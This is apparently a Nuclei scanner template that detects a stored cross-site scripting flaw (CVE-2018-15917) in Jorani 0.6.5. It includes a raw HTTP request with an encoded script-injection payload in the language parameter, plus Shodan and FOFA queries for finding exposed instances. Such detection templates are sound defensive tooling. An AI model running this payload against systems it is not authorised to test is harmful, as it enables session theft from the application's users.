id: CVE-2018-15917 info: name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language. impact: | Authenticated attackers can inject persistent malicious JavaScript through the language parameter that executes in other users' browsers including administrators, potentially stealing session cookies, credentials, or performing unauthorized actions in Jorani leave management system. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45338 - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 - https://github.com/bbalet/jorani/issues/254 - https://github.com/JavierOlmedo/JavierOlmedo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2018-15917 cwe-id: CWE-79 epss-score: 0.06483 epss-percentile: 0.93155 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: jorani_project product: jorani shodan-query: - title:"Login - Jorani" - http.favicon.hash:-2032163853 fofa-query: icon_hash=-2032163853 tags: cve,cve2018,jorani,xss,jorani_project,vuln http: - raw: - | GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1 Host: {{Hostname}} - | GET /session/login HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '' - '_jorani' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100b2f17276a6d7dab20c7ce9a289ee88881ee382ac3637e1fd44d0b31e45435e7302206810d8da0516306423d495a1c8696a0689bfd81028c47b3637eee0ec10c78e8e:922c64590222798bb761d5b6d8e72950